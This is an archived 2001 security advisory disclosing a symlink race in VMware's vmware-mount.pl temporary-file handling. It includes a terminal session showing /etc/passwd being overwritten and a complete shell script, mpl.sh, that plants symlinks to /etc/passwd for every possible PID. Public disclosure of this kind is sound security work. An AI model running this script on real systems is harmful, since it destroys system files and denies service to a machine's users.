1. Problem description ---------------------- There is symlink vulnerability in the vmware-mount.pl script which comes with lates VMware. 2. Details ---------- While mounting virtual disk drives using the vmware-mount.pl script, a temporary file named vmware-mount.pl.PID where PID is the current pid of the command will be created in an insecure manner. This allows an attacker to overwrite any local file, if root mounts a VMware's virtual partition (mounting is usually done as root). Example: paul@ps:/tmp > id uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall) paul@ps:/tmp > ./mpl.sh VMware local /etc/passwd DoS By Ihq. linking /etc/passwd to /tmp [+] please wait for root to run vmware-mount.pl after running vmware-mount.pl: paul@ps:/tmp > id uid=500 gid=100(users) Gruppen=100(users),90(firewall) Obviously the passwd file has been overwritten: paul@ps:/tmp > cat /etc/passwd Nr Start Size Type Id Sytem -- ---------- ---------- ---- -- ------------------------ 1 63 2096577 BIOS C Win95 FAT32 (LBA) I'm not sure, if it is exploitable for priviledge elevation. 3. Impact --------- Local file corruption. ---------------------- mpl.sh ---------------------- #/bin/bash declare -i n declare -i mx n=2 mx=32767 echo echo "VMware local /etc/passwd DoS" echo "By Ihq." echo echo " linking /etc/passwd to /tmp" while test $n -lt $mx ; do ln -s /etc/passwd /tmp/vmware-mount.pl.$n n=$(($n + 1)) done echo "[+] please wait for root to run vmware-mount.pl" echo
This archive was generated by hypermail 2b30 : Thu Apr 19 2001 - 10:50:24 PDT